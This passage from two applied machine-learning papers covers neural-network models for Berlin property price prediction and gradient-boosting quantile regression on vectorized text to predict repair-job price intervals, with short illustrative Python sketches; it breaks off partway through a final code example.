Fig. 11. RNN neural network
As the code snippet in Fig. 11 shows, the first layer is a lambda layer. A lambda layer allows an arbitrary expression to be used as a layer, and such layers are generally used in sequential models. In our use case we had a simple expression to experiment with, hence we used it. With this model we achieved a mean squared error as low as 0.089 and a mean absolute error of 0.222.
Fig. 12. Loss curve simple RNN
The graph in Fig. 12 shows how the model learns with every epoch: it improved within very few epochs and then stabilised. We used hyperparameter tuning for the learning rate of our RNN model; in this way we can control the speed at which the model learns, as is evident from Fig. 13.
Fig. 13. RNN learning rate
Fig. 14. Loss curve RNN using hyperparameter tuning
After implementing this, we can see from the way the model learns in the graph of Fig. 14 that it has improved. When we train a model, we expect a smooth bell-shaped curve, which we achieved with this experiment.
3.3 Hybrid Neural Network
In our last experiment we worked on a hybrid neural network [10, 11] that combines one lambda layer, one Conv1D layer, two LSTM layers, two SimpleRNN layers, three dense layers, and one final dense output layer, as shown in Fig. 15. We wanted to see how the hybrid model performs on our data and how it compares with the other models. In the hybrid model we also tuned the learning rate of the Adam optimizer.
Fig. 15. Hybrid neural network
Most of the layers used here are explained in Sects. 3.1 and 3.2. The metrics used to evaluate all the above models were the mean squared and mean absolute errors, and the values obtained for this neural network were 0.12 and 0.26, respectively. The loss curve of the hybrid model was also impressive, as shown in Fig. 16: there is no noise in its trend.
Fig. 16. Loss curve hybrid neural network
4 Results
The main objective of this paper was to find the best neural network for the real estate market in Berlin, Germany. We worked on multiple models and tried to improve them by using different loss functions, finding the best delta value for the Huber loss function, and tuning the hyperparameters of the Adam optimizer. In this section we discuss and tabulate the results and the tests we carried out. We took properties currently offered online and compared how well the models perform on this real-world data. We applied various pre-processing steps to make the data suitable for the models to learn from, as explained briefly in Sect. 2. The different models and their respective errors are shown in Table 1:
Table 1. Metrics comparison for models

| Model | Mean squared error | Mean absolute error |
|---|---|---|
| Deep Neural Nets with MSE loss function | 0.177 | 0.271 |
| Deep Neural Nets with Huber Loss function | 0.215 | 0.3163 |
| Simple RNN | 0.102 | 0.235 |
| Simple RNN with hyperparameter tuning Adam Optimizer | 0.106 | 0.241 |
| Hybrid Neural Network | 0.124 | 0.268 |
We have also discussed the loss curves of these models in Sect. 3, to understand how the models are learning. A comparison of the test data for each model is shown in Table 2.

Table 2. Test data comparison

| Test data | Model 1 | Model 2 | Model 3 | Model 4 | Model 5 |
|---|---|---|---|---|---|
| 8.545 | 8.584 | 8.782 | 8.598 | 8.530 | 8.613 |
| 8.370 | 8.283 | 8.475 | 8.398 | 8.261 | 8.434 |
| 8.694 | 8.577 | 8.632 | 8.408 | 8.253 | 8.412 |
| 7.717 | 7.777 | 7.390 | 7.866 | 7.861 | 7.909 |
| 7.740 | 7.651 | 7.719 | 7.783 | 7.664 | 7.743 |

NOTE: These are the log values directly from the model, which was trained on normalized log values.

In this table:
• Model 1 = Deep Neural Nets with MSE loss function
• Model 2 = Deep Neural Nets with Huber Loss function
• Model 3 = Simple RNN
• Model 4 = Simple RNN with hyperparameter tuning Adam Optimizer
• Model 5 = Hybrid Neural Network
The numbers in the tables are property prices per square feet, expressed as log values. These results come straight from the models on the test data; we divided our data into 80% training and 20% validation data. In the pre-processing we normalised the data to get better performance out of the models, and we tabulated the log values directly as the models produced them. In this section we take real-time data from online listings and try to find which model works best on them. These are real properties that we used to test our models.
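To read the tabulated log values as prices, the log1p transform has to be inverted. The sketch below does this for the first "Test data" entry of Table 2 and the corresponding Model 1 prediction. It assumes that the tabulated numbers are plain log1p outputs with no further scaling, which the note under the table does not fully settle.

```python
import math


def from_log1p(value):
    """Invert y = log1p(price), i.e. price = exp(y) - 1."""
    return math.expm1(value)


test_value = 8.545     # first "Test data" entry of Table 2
model_1_value = 8.584  # corresponding Model 1 prediction

actual = from_log1p(test_value)
predicted = from_log1p(model_1_value)
relative_error = abs(predicted - actual) / actual

print(round(actual), round(predicted), f"{relative_error:.1%}")
```

A difference of about 0.04 on the log scale therefore corresponds to a relative price error of roughly four percent, which is easier to interpret than the raw log values.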
Fig. 17. Online real time property data
Note: In Fig. 17 we took the log values of the living_sqm field because our model is trained with log values; for that we only need log1p from the NumPy library. Here we compare the two ANN models, the two RNN models and the hybrid model separately, to observe how the changes behave.
Fig. 18. Comparison of ANN models
In the graph of Fig. 18 we plotted the online price, the deep ANN model price, and the price from the model with Huber loss.
It is evident from the plot that the deep ANN model with Huber loss performs a lot better than the deep neural network model with MSE loss. As explained in Sect. 3.1, Huber loss is more robust to outliers than the usual MSE loss function. For properties 9 and 15 the online prices are high, and the model performs well on these outliers, which here means properties priced higher than usual.
Fig. 19. Comparison of RNN and hybrid neural network
The graph in Fig. 19 compares the RNN and hybrid models. In this figure we can clearly observe that the hybrid model with Huber loss is more accurate than the conventional neural networks.
5 Conclusion
The main objective of this paper was to experiment with neural networks, optimizers, and loss functions to see which suit the property price prediction regression problem best. We considered all the combinations and discussed the results in Sect. 4. From all the experiments carried out on this topic, we can conclude that
• tuning the learning rate of the Adam optimizer,
• using the Huber loss function with a delta value of 1.75, and
• using the hybrid neural network
is the best combination for this use case.
References
1. Kauskale, L.: Integrated approach of real estate market analysis in sustainable development context for decision making. Procedia Eng. 172, 505–512 (2017)
2. Jha, S.B.: Machine learning approaches to real estate market prediction problem: a case study. arXiv:2008.09922 (2020)
3. Tabales, J.M.N.: Artificial neural networks for predicting real estate prices. Revista De Methodos Cuantitativos para la economia y la empresa 15, 29–44 (2013)
4. Hamzaoi, Y.E., Hernandez, J.A.: Application of artificial neural networks to predict the selling price in the real estate valuation. In: 10th Mexican International Conference on Artificial Intelligence, pp. 175–181 (2011)
5. Kauko, T., Hooimaijer, P., Hakfoort, J.: Capturing housing market segmentation: an alternative approach based on neural network modelling. Hous. Stud. 17(6), 875–894 (2002)
6. Fukumizu, K.: Influence function and robust variant of kernel canonical correlation analysis. Neurocomputing, 304–307 (2017)
7. Rahimi, I., Bahmanesh, R.: Using combination of optimized recurrent neural network with design of experiments and regression for control chart forecasting. Int. J. Sci. Eng. Invest. 1(1), 24–28 (2012)
8. Cook, D.F., Ragsdale, C.T., Major, R.L.: Combining a neural network with a genetic algorithm for process parameter optimization. Eng. Appl. Artif. Intell. 13, 391–396 (2000)
9. Kingma, D.P.: Adam: a method for stochastic optimization. In: International Conference on Learning Representations (2015)
10. Lee, E.W.M.: A hybrid neural network model for noisy data regression. IEEE Trans. Cybern. 34, 951–960 (2004)
11. Williamson, J.R.: Gaussian artmap: a neural network for fast incremental learning of noisy multidimensional maps. Neural Netw. 9(5), 881–897 (1996)
Text Regression Analysis for Predictive Intervals Using Gradient Boosting
Alexander I. Iliev1,2(B) and Ankitha Raksha1
1 SRH Berlin University, Charlottenburg, Germany
[email protected]
2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, Sofia, Bulgaria
Abstract. In this paper, we explore text data analysis with the help of different methods for vectorizing the data and carrying out regression. At present there are many text categorization techniques, but very few algorithms are dedicated to text regression. Moreover, many regression models predict only a single estimated value. It is often more useful to predict a numerical range than a single estimate, since we can be more certain that the true value lies within the range than that it equals the estimate. We aim to combine both techniques in this paper. The goal of this paper is to collect text data, clean the data, and create a text regression model in order to find the best-suited algorithm that could be used in any situation, through the use of quantile regression.
Keywords: Text analysis · tf-idf · word2vec · GloVe · Text regression · Word vectorization · Quantile · Gradient boosting · Natural language processing
1 Introduction
With the help of Natural Language Processing (NLP) and its components, we can organize huge amounts of data. NLP is a powerful AI method for communicating with an intelligent system using natural language. We can perform numerous automated tasks and solve a wide range of problems, such as automatic summarization, machine translation, entity recognition, speech recognition, and topic segmentation. Most machine learning algorithms work with numerical data and cannot understand text directly, so we need a way to convert the text into numbers that can be fed into the models. After the data has been pre-processed and cleaned, we therefore perform a process called word vectorization, and the numerical forms of the words are called vectors. To gain the confidence of decision makers, it is often better not to present a single number as an estimate, but to provide a prediction range that reflects the uncertainty inherent in all models.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 257–269, 2023. https://doi.org/10.1007/978-3-031-28073-3_18
2 About the Data
The data were collected from Plentific GmbH over the last two years and comprise around 170,000 records. They consist of various textual fields that describe the specifics of a home repair job posted on the marketplace, such as category, service, type, job description, and emergency tag type. These fields are the features used to predict the price of the repair job, which is our target value.
Fig. 1. Histogram of the repair job and their price value for the maximum value of 500
From the histogram of the repair jobs and their prices in Fig. 1, we see that repair job prices are spread from as little as 10 pounds to as much as 500 pounds.
2.1 Data Preparation
Data preparation involves cleaning the data, which is one of the simplest yet most important steps in the entire data modelling process. How well we clean and understand the raw input data and prepare the output data has a big impact on the quality of the results, even more than the choice of model, model tuning, or trying different models. All text data in its original form contains a lot of unnecessary data, which we call noisy or dirty data, and which must be cleaned. Failure to do so can result in skewed data that ultimately leads the organization to make poor decisions. Cleaning text is particularly difficult compared with cleaning numbers, because we cannot perform the usual statistical analysis that is possible with numerical data.
Steps in text cleaning:
a) Remove null values from the data.
b) Convert all words to lower case.
c) Remove numbers.
d) Remove newline characters.
e) Remove any HTML tags.
f) Remove punctuation, limiting the text to the words that carry an actual message.
g) Lemmatization: bringing a word into its root form.
To remove outliers from the dataset and to reduce the variance among different repair jobs, we limited the accepted price values to the range from 45 to 125 pounds, as in Fig. 2. Initially we had almost 170,000 data records; after removing outliers, 115,000 records are left in our dataset, which is almost 70% of the data.
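Steps a) to f) of the list above can be sketched with the Python standard library as follows. This is an illustration, not the pipeline used in the study: the example record is invented, the steps are applied in a slightly different order (tags are stripped before lower-casing), and lemmatization (step g) is left out because it needs a language resource such as a lemmatizer from an NLP library.

```python
import html
import re
import string

TAG_RE = re.compile(r"<[^>]+>")
DIGIT_RE = re.compile(r"\d+")
SPACE_RE = re.compile(r"\s+")
# Map every punctuation character to a space so that words do not get glued together.
PUNCT_TABLE = str.maketrans({ch: " " for ch in string.punctuation})


def clean_text(text):
    """Apply steps b) to f): lower case, no numbers, newlines, tags or punctuation."""
    text = html.unescape(text)          # turn entities such as &amp; into characters
    text = TAG_RE.sub(" ", text)        # e) remove HTML tags
    text = text.lower()                 # b) lower case
    text = DIGIT_RE.sub(" ", text)      # c) remove numbers
    text = text.translate(PUNCT_TABLE)  # f) remove punctuation
    return SPACE_RE.sub(" ", text).strip()  # d) newlines and repeated spaces


def clean_records(records):
    """a) drop null or empty records, then clean the remaining ones."""
    return [clean_text(r) for r in records if r]


raw = "<p>Boiler NOT working!\nNeeds repair within 24 hours.</p>"
cleaned = clean_text(raw)
print(cleaned)  # boiler not working needs repair within hours
```

Replacing punctuation with spaces rather than deleting it avoids merging words that were separated only by a punctuation mark or a line break.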
Fig. 2. Histogram of the repair job and their price value for the maximum value of 125 and minimum of 45
3 Literature Survey
For our case, we had to draw insights from previous work on text regression. One such study considers different text corpora to predict the age of a text's author using a linear model and text features [1]. Another study used more complex modelling, namely convolutional neural networks (CNN), for text regression in financial analysis [2]. A similar study on financial documents pertaining to stock volatility analyzes different documents and predicts risk using support vector regression [3]. In another study, the authors proposed a text regression model based on a conditional generative adversarial network (GAN) [4]; the model works with unbalanced datasets of limited labeled data, which aligns with real-world scenarios [5]. Feeding both text data and metadata into the same model combines two different data structures, a concept that was explained well in the context of predicting movie revenues [6]. One paper presents a non-linear method based on a deep convolutional neural network [7]. Another paper suggests the use of logistic regression and discusses its advantages for text categorization [8].
TF-IDF has mathematical underpinnings that give rise to the notion of the probability-weighted amount of information (PWI). To understand how TF-IDF weights can help reach a relevance decision, the authors proposed a model that combines the local relevance decision with a document-wide relevance decision [9]. Another method for word representation is word2vec, originally developed by Google researchers to obtain an efficient word representation in an N-dimensional vector space; they illustrated two different models, Skip-gram and Continuous Bag of Words [10]. Extending this study, another paper discusses emerging trends that come with word2vec, including the different operations that can be carried out on words to find relationships [11], and how it can be applied to big text content [12]. Like word2vec, there is GloVe, short for Global Vectors, developed by Stanford researchers, who showed that the result is a combination of global matrix factorization and local context window methods [13]. Models have also been built on top of the GloVe baseline model to get better results [14]. There is also a study that shows a way to combine the word2vec and GloVe models [15].
Decision trees are better suited to fitting nonlinear, non-normal data [16], and combining many models in ensemble learning increases the accuracy of the model [17]. Gradient boosting is a greedy function approximation method that can incorporate loss functions such as least squares, least absolute deviation, and Huber-M [18]. Another paper provides conditions for a quantile regression model and proposes a transformation of the data that eliminates the fixed effects by assuming that they are location shifters [19]. There have been many attempts at predicting intervals, such as fuzzy intervals [20] and a machine learning approach for artificial and real hydrologic data sets [21].
4 Word Vectorization
Word vectorization schemes are needed in machine learning for the simple reason that the encoding scheme we are most familiar with as humans, the alphabet, tells us very little about the nuances of the words it represents. The need for good embedding schemes grows because we cannot simply feed a network the binary data from ASCII, or a one-hot encoding based on an extensive vocabulary: these soon balloon into unacceptably large dimensions that no neural network can easily handle. Neural networks for natural language processing are well known for the fact that their performance depends almost entirely on how good their word embedding is. The goal of word embedding, then, is to solve these problems and provide the model with a learned representation that places words in a high-dimensional space, where the position of a word says something about the word and its relationship to all the other words in the vocabulary. The goals of word embedding are:
• To reduce dimensionality
• To use a word to predict the words around it
• To capture inter-word semantics
There are many word vectorization techniques, but we want to focus on the following:
4.1 Term Frequency-Inverse Document Frequency (TF-IDF)
Term frequency-inverse document frequency (TF-IDF) is a method whose main purpose is to introduce a measure of how meaningful a word is within a document. This is done through a statistical analysis of word frequencies and is represented by the following formula:
$$\text{TF-IDF}(w) = \mathrm{TF}(w) \times \mathrm{IDF}(w)$$
where TF stands for term frequency and IDF stands for inverse document frequency, formulated as follows:
$$\mathrm{TF}(w) = \frac{\text{number of occurrences of } w \text{ in the document}}{\text{total number of words in the document}}$$
$$\mathrm{IDF}(w) = \log \frac{\text{number of documents}}{\text{number of documents containing the word } w}$$
4.2 Word2Vec
Word2Vec is a method for generating word embeddings. It converts words into vectors, and with vectors we can perform several operations, such as adding, subtracting, and calculating distances, so that relationships between words are preserved. Unlike TF-IDF, word2vec and similar encoding methods use a neural network model that provides an N-dimensional vector for each word. Training a word2vec model is also very resource intensive, as it requires a large amount of RAM to store the vocabulary of the corpus. In simple terms, word2vec tries to embed words with similar contexts similarly. Word2vec, or any other vector embedding method using a neural network trained on different corpora, has “rightly” gained knowledge about words through the similarity of their surrounding words. There are two types:
a) Continuous Bag of Words (CBOW): a word is predicted from the surrounding words. In the example shown in Fig. 3, we try to predict the word ‘Jumps’ from all the other words in the sentence.
b) Skip-gram: one word is used to predict the surrounding words. In the example shown in Fig. 4, we try to predict all the other words in the sentence from the word ‘Jumps’.
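The TF-IDF formulas of Sect. 4.1 translate directly into code. The sketch below uses a tiny invented corpus of tokenised repair descriptions; it assumes that the queried word occurs in at least one document, since otherwise the IDF denominator would be zero.

```python
import math


def tf(word, document):
    """Occurrences of the word divided by the number of words in the document."""
    return document.count(word) / len(document)


def idf(word, corpus):
    """Log of the number of documents over the number of documents containing the word."""
    containing = sum(1 for document in corpus if word in document)
    return math.log(len(corpus) / containing)  # assumes containing > 0


def tf_idf(word, document, corpus):
    return tf(word, document) * idf(word, corpus)


# Hypothetical corpus: each document is a list of tokens.
corpus = [
    "boiler not heating water".split(),
    "tap leaking water".split(),
    "boiler pressure low".split(),
]

for word in ("heating", "water"):
    print(word, round(tf_idf(word, corpus[0], corpus), 4))
```

"heating" appears in only one document and therefore receives a higher weight in the first document than "water", which appears in two of the three documents.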
Fig. 3. Continuous bag of words example
A. I. Iliev and A. Raksha
Fig. 4. Skip-gram model example
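The difference between the two Word2Vec variants lies in how training examples are built from a sentence. The sketch below generates both kinds of examples; the sentence and the window size of 2 are assumptions chosen for illustration and are not taken from the figures.

```python
def context_window(tokens, index, window):
    """Return the tokens within `window` positions of tokens[index], excluding it."""
    left = tokens[max(0, index - window):index]
    right = tokens[index + 1:index + 1 + window]
    return left + right


def cbow_examples(tokens, window):
    """CBOW: the context words are the input, the centre word is the target."""
    return [(context_window(tokens, i, window), tokens[i]) for i in range(len(tokens))]


def skipgram_examples(tokens, window):
    """Skip-gram: the centre word is the input, each context word is one target."""
    return [
        (tokens[i], ctx)
        for i in range(len(tokens))
        for ctx in context_window(tokens, i, window)
    ]


# Assumed example sentence; index 4 is the word "jumps".
sentence = "the quick brown fox jumps over the lazy dog".split()
cbow = cbow_examples(sentence, window=2)
skipgram = skipgram_examples(sentence, window=2)
jumps_pairs = [pair for pair in skipgram if pair[0] == "jumps"]

print(cbow[4])       # (['brown', 'fox', 'over', 'the'], 'jumps')
print(jumps_pairs)   # [('jumps', 'brown'), ('jumps', 'fox'), ('jumps', 'over'), ('jumps', 'the')]
```

CBOW yields one example per position with several input words, whereas skip-gram yields one example per (centre, context) pair, which is why it produces more training pairs from the same sentence.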
4.3 GloVe
GloVe is an abbreviation for Global Vectors. The difference between Word2Vec and GloVe is that Word2Vec considers only the local context of a word in the dataset, whereas GloVe also uses global co-occurrence statistics. GloVe is a word representation scheme that aims to capture semantic relations between words in their embeddings. It does so by explicitly modelling co-occurrence probabilities, as demonstrated empirically in the GloVe paper [13] and shown in Table 1:
Table 1. GloVe co-occurrence matrix example
Probability and ratio      k = 'solid'  k = 'gas'  k = 'water'  k = 'fashion'
P(k|'ice')                 1.90E-04     6.60E-05   3.00E-03     1.70E-05
P(k|'steam')               2.20E-05     7.80E-04   2.20E-03     1.80E-05
P(k|'ice') / P(k|'steam')  8.90E+00     8.50E-02   1.30E+00     9.60E-01
The words 'ice' and 'steam' are compared with various probe words: 'solid', 'gas', 'water' and 'fashion'. The ratios in the last row show that 'ice' is more closely related to 'solid' than to 'gas', and that the converse holds for 'steam'. Both words co-occur with 'water' comparatively often and with 'fashion' very rarely, so for these two probe words the ratio is close to 1 [13]. All of this argues that an embedding should be built not just on the word probabilities but on the co-occurrence probabilities within the context, and this is what enters the loss function. The essence of GloVe is to build a matrix from these co-occurrence statistics and subsequently learn a vector representation of each word. This leads to the loss function in its entirety:
$J = \sum_{i,j} f(X_{ij}) \left( w_i^T w_j + b_i + b_j - \log X_{ij} \right)^2$
where
• $f(X_{ij})$ is the weighting function,
• $w_i^T w_j$ is the dot product of the input and output vectors,
• $b_i + b_j$ is the bias term,
• $X_{ij}$ is the number of occurrences of word j in the context of word i.
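The loss above can be evaluated directly for a small co-occurrence table. The sketch below is a plain-Python illustration, not the reference implementation: the weighting function with x_max = 100 and exponent 0.75 follows the GloVe paper [13], while the data layout (a dictionary of counts, lists of vectors) and all names are hypothetical.

```python
import math


def weight(x, x_max=100.0, alpha=0.75):
    """Weighting function f(X_ij) as proposed in the GloVe paper [13]."""
    return (x / x_max) ** alpha if x < x_max else 1.0


def dot(u, v):
    """Dot product of two equally long vectors."""
    return sum(a * b for a, b in zip(u, v))


def glove_loss(cooc, w, w_ctx, b, b_ctx):
    """Sum of f(X_ij) * (w_i . w_j + b_i + b_j - log X_ij)^2 over observed pairs."""
    total = 0.0
    for (i, j), x_ij in cooc.items():
        if x_ij <= 0:
            continue  # log(0) is undefined; such pairs carry zero weight anyway
        residual = dot(w[i], w_ctx[j]) + b[i] + b_ctx[j] - math.log(x_ij)
        total += weight(x_ij) * residual ** 2
    return total


# Hypothetical two-word vocabulary with 2-dimensional vectors.
cooc = {(0, 1): 12.0, (1, 0): 150.0}
w = [[0.1, 0.3], [-0.2, 0.4]]        # input (word) vectors
w_ctx = [[0.05, -0.1], [0.2, 0.1]]   # output (context) vectors
b = [0.0, 0.1]
b_ctx = [0.2, 0.0]

loss = glove_loss(cooc, w, w_ctx, b, b_ctx)
print(loss)
```

The weighting keeps very frequent pairs from dominating the sum: every count at or above x_max receives weight 1, while rare pairs are down-weighted.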
5 The Intuition of Text Regression
We have all heard of text classification, where a given text or sentence is assigned to one of several classes, so that a class name is predicted when a new text arrives. In today's world, however, only a small share of data is structured; the rest is unstructured, and much of it is text. There are cases where we need to predict a number for a given text: the price of a property from its description, the number of "likes" an article may receive, or the age of an author from the vocabulary used in an article or story [1]. These real-world examples illustrate the importance of text regression.
5.1 Gradient Boosting Regressor
Gradient boosting regression is a boosting algorithm that builds decision trees sequentially, each new tree correcting the errors of the previous ones. We trained two models, one predicting a lower bound and the other an upper bound, by providing a value for the quantile, or "alpha", of each, so that together they create an interval. Predicting a numerical range in this way is very useful in situations where we cannot rely one hundred percent on a single number. This is important in our case because textual data such as a repair order description contains many variations that only the contractor can properly interpret, based on experience. For this reason, we chose quantile regression rather than plain linear regression. Gradient boosting regressors have been shown to fit and perform better on complex data sets. Another reason for choosing this algorithm is that it provides intrinsic quantile prediction functionality through its loss function.
5.2 Quantile Regression Model
Before looking at the quantile regression model, we must first understand quantiles. In general, quantiles are cut points that divide the data into equal-sized groups.
Percentiles are simply quantiles that divide the data into a hundred equal groups. For example, the 75th percentile (the 0.75 quantile) is the point below which 75% of the data lies. The quantiles are known only from the distribution of the data provided to the model. Linear regression, or ordinary least squares (OLS), assumes that the relationship between the input variables X and the output label Y can be expressed as a linear function:
$Y = \theta_0 + \theta_1 X_1 + \theta_2 X_2 + \dots + \theta_p X_p + \varepsilon$
where Y is the dependent variable, $X_1, \dots, X_p$ are the independent variables, $\theta_0, \dots, \theta_p$ are the coefficients and $\varepsilon$ is the error term. The objective loss function is the squared error, represented as:
$L = (y - X\theta)^2$
where y is the actual value and Xθ is the predicted value. With quantile regression we have an extra parameter τ ∈ (0, 1), which specifies the τth quantile of the target variable Y that the model should estimate, and the loss function becomes:
$L = \begin{cases} \tau \, (y - y'), & y - y' \ge 0 \\ (\tau - 1)(y - y'), & y - y' < 0 \end{cases}$
where τ is the quantile, L is the quantile loss, y is the actual value and y' is the predicted value. We want to penalize predictions that are too high when the target percentile is low, and predictions that are too low when the target percentile is high. In other words, we use the quantile loss to predict a percentile below which we are confident the true value lies with the stated probability. The first case, y − y' ≥ 0, means that the value predicted by the model is at or below the actual value. This is acceptable when we want to predict a lower percentile, so the error is weighted by the small factor τ; for a higher percentile τ is large and the same error is penalized heavily. The second case, y − y' < 0, means that the prediction is above the actual value. This is acceptable for higher percentiles, where the factor 1 − τ is small, but is penalized heavily for lower percentiles. The quantile loss therefore depends on the quantile being estimated: positive errors (y − y' > 0) are penalized more when we specify higher quantiles, and negative errors (y − y' < 0) are penalized more for lower quantiles. Now that we understand quantile regression, we need to see how to apply it in our scenario. Gradient boosting regression has an option to use the quantile loss, which simplifies the process: we specify loss = "quantile" and pass the desired quantile as alpha.
5.3 Benchmarking the Model
To evaluate model performance, and how well the predicted interval fits the true value, we consider how often the true value is captured in the interval.
In other words, the accuracy of the model is the number of records whose actual price lies within the predicted interval, divided by the total number of records.
5.4 Model Comparisons
So far we have considered only three popular methods of text vectorization: TF-IDF, Word2Vec and GloVe. Table 2 shows the statistics of those methods:
Table 2. Method comparison
Methods    Test accuracy  Training time
TF-IDF     75.10%         3 min
Word2Vec   75.50%         10 min
GloVe      74.60%         6 min
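The two-model setup described in Sects. 5.1 and 5.2 can be sketched as follows. This is a minimal illustration under stated assumptions, not the pipeline used for the experiments: it assumes scikit-learn's GradientBoostingRegressor and TfidfVectorizer (the parameter names loss, alpha and n_estimators in the text match that library), the repair descriptions and prices are invented, and the interval is checked on the training data only to keep the example short.

```python
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.feature_extraction.text import TfidfVectorizer


def pinball_loss(y_true, y_pred, tau):
    """Mean quantile loss: tau * (y - y') if y - y' >= 0, else (tau - 1) * (y - y')."""
    diff = np.asarray(y_true, dtype=float) - np.asarray(y_pred, dtype=float)
    return float(np.mean(np.where(diff >= 0, tau * diff, (tau - 1) * diff)))


# Hypothetical repair descriptions with noisy prices in pounds (illustration only).
rng = np.random.default_rng(0)
jobs = {"replace kitchen tap": 80.0, "repair roof tile": 120.0, "unblock bathroom sink": 60.0}
texts, prices = [], []
for _ in range(100):
    for text, base_price in jobs.items():
        texts.append(text)
        prices.append(base_price + rng.normal(0.0, 10.0))
prices = np.array(prices)

# Dense features are used here for simplicity on this tiny corpus.
X = TfidfVectorizer().fit_transform(texts).toarray()

# One model per bound; alpha is the quantile level of the quantile loss.
lower_model = GradientBoostingRegressor(loss="quantile", alpha=0.2, n_estimators=100, random_state=0)
upper_model = GradientBoostingRegressor(loss="quantile", alpha=0.8, n_estimators=100, random_state=0)
lower = lower_model.fit(X, prices).predict(X)
upper = upper_model.fit(X, prices).predict(X)

# Accuracy in the sense of Sect. 5.3: share of records whose price falls in the interval.
coverage = float(np.mean((prices >= lower) & (prices <= upper)))
print(f"coverage: {coverage:.2f}")
print(f"quantile loss of lower model: {pinball_loss(prices, lower, 0.2):.2f}")
```

In a real evaluation the two models would be scored on a held-out test split, as done for the accuracies reported in this section.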
The values in Table 2 were obtained with gradient boosting models trained with quantile values 0.2 and 0.8, to understand how the different methods behave. Word2Vec, the slowest method to train, gives the highest accuracy, but longer training does not always pay off: GloVe takes twice as long as TF-IDF and is slightly less accurate. There is always a trade-off between accuracy and computational time, because training that is computationally expensive in the production environment also costs a lot of money. It is therefore preferable to achieve good accuracy at minimal cost. Note that the training time may vary with the size of the dataset and the instances used to train the models. In our case we used a g4dn.xlarge GPU instance, but again it is all a matter of resources and optimization. To keep the training time for the different tests as low as possible, we used the model with the TF-IDF vectorization method to test different quantile values, as shown in Table 3:
Table 3. Quantile comparisons
Lower quantile  Upper quantile  Testing accuracy  Interval difference [in pounds]
0.2             0.8             75%               28
0.18            0.82            78%               30
0.15            0.85            82%               34
0.1             0.9             89%               44
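The trade-off in Table 3 can be made explicit with a little arithmetic. A pair of perfectly calibrated quantile models at levels τ_lo and τ_hi would capture a share τ_hi − τ_lo of the data, which gives a nominal reference point for each row. The sketch below computes this nominal coverage and the accuracy gained per extra pound of interval width; the numbers are copied from Table 3 and the variable names are hypothetical.

```python
# (lower quantile, upper quantile, reported test accuracy in %, interval difference in pounds)
table3 = [
    (0.20, 0.80, 75, 28),
    (0.18, 0.82, 78, 30),
    (0.15, 0.85, 82, 34),
    (0.10, 0.90, 89, 44),
]

# Nominal coverage of a calibrated interval: upper quantile minus lower quantile.
nominal = [round((hi - lo) * 100) for lo, hi, _, _ in table3]

# Accuracy points gained per additional pound of width between consecutive rows.
gains = [
    (table3[k + 1][2] - table3[k][2]) / (table3[k + 1][3] - table3[k][3])
    for k in range(len(table3) - 1)
]

for (lo, hi, accuracy, width), nom in zip(table3, nominal):
    print(f"[{lo:.2f}, {hi:.2f}]  nominal {nom}%  reported {accuracy}%  width {width}")
print(gains)  # [1.5, 1.0, 0.7]
```

Each widening step buys less accuracy per pound than the previous one, which supports choosing a moderately narrow interval rather than the widest one.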
Table 3 shows the test accuracy for different quantile levels, together with the interval difference (in pounds) between the lower and upper limits. There is a clear trade-off between the accuracy achieved and the interval difference, since it is easy to capture more of the actual values simply by widening the range. However, this is not our goal, as a large range is not useful in the real world. What we need is a reasonably narrow range with good accuracy.
5.5 Hyperparameter Tuning
To understand the model even better, and since we had a large enough data set, we increased the share of test data from 20% to 40%. The result of this experiment is quite interesting, as it yielded accuracy similar to the 80%/20% split. Before reaching a conclusion, we had to test different values for the parameters of the gradient boosting regression. We chose n_estimators, the number of trees built in the model, as the parameter to vary. Table 4 shows the results for different values of n_estimators:
Table 4. N_estimators hyperparameters
n_estimators  Test accuracy
40            82.66%
60            82.78%
80            82.86%
100           83.20%
120           83.08%
140           82.93%
160           82.92%
We can conclude that the change in accuracy is minimal: it varies only by fractions of a percentage point. The accuracy peaks at 100 trees (83.20%) and then decreases again. A characteristic of gradient boosting trees is that they depend on the learning rate and the average price value. Since the target value is mostly the same even for different repair jobs, this also affects the overall value when the trees are built.
6 Result
Table 5 shows an example of the predicted lower and upper limits for repair orders, labelled "Lower" and "Upper" in the table, while "Price" is the actual value in the test data.
Table 5. Results
id  Price  Lower      Upper
1   90     58.821936  90.234450
2   85     49.699136  97.002349
3   84     59.973129  94.544094
4   80     65.785190  93.253945
5   95     60.164752  90.126343
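The accuracy measure of Sect. 5.3 can be applied to the five example rows of Table 5. In the sketch below the smaller of the two predicted values in each row is read as the lower bound and the larger as the upper bound; the function and variable names are hypothetical.

```python
# (id, price, lower bound, upper bound) for the five example rows of Table 5.
rows = [
    (1, 90, 58.821936, 90.234450),
    (2, 85, 49.699136, 97.002349),
    (3, 84, 59.973129, 94.544094),
    (4, 80, 65.785190, 93.253945),
    (5, 95, 60.164752, 90.126343),
]


def interval_accuracy(rows):
    """Share of rows whose actual price lies inside the predicted interval."""
    hits = sum(1 for _, price, lower, upper in rows if lower <= price <= upper)
    return hits / len(rows)


accuracy = interval_accuracy(rows)
missed = [row_id for row_id, price, lower, upper in rows if not lower <= price <= upper]
mean_width = sum(upper - lower for _, _, lower, upper in rows) / len(rows)

print(accuracy)    # 0.8
print(missed)      # [5]
print(mean_width)  # about 34.14 pounds
```

Four of the five prices fall inside their interval; only row 5, whose price of 95 exceeds the predicted upper bound, is missed.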
For our model, we need to show the prediction error on the test set. Measuring the error of a prediction interval is more difficult than measuring the error of a single predicted number. We can easily determine the percentage of cases where the true value was captured in the interval, but this percentage can easily be inflated by widening the interval boundaries. Therefore, we also report absolute error calculations to account for this, as in Table 6:
Table 6. Absolute error calculations
Statistic  absolute_error_lower  absolute_error_upper  absolute_error_interval
Count      45343.000             45343.000             45343.000
Mean       18.749340             20.576137             19.662739
Std        15.600487             13.186537             6.646751
Min        0.000465              0.000292              2.152931
25%        6.298666              9.967990              14.898903
50%        13.917017             19.058457             18.511
75%        27.664566             29.542923             22.241346
Max        75.874350             67.695534             57.763181
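The three error columns of Table 6 can be illustrated on the five example rows of Table 5. The definitions used below are assumptions, since the text does not spell them out: the lower and upper errors are taken as the absolute distance between the price and the respective bound, and the interval error as the average of the two. The last assumption is at least consistent with the reported means, because (18.749340 + 20.576137) / 2 ≈ 19.662739.

```python
from statistics import mean, median

# (price, lower bound, upper bound) for the five example rows of Table 5.
rows = [
    (90, 58.821936, 90.234450),
    (85, 49.699136, 97.002349),
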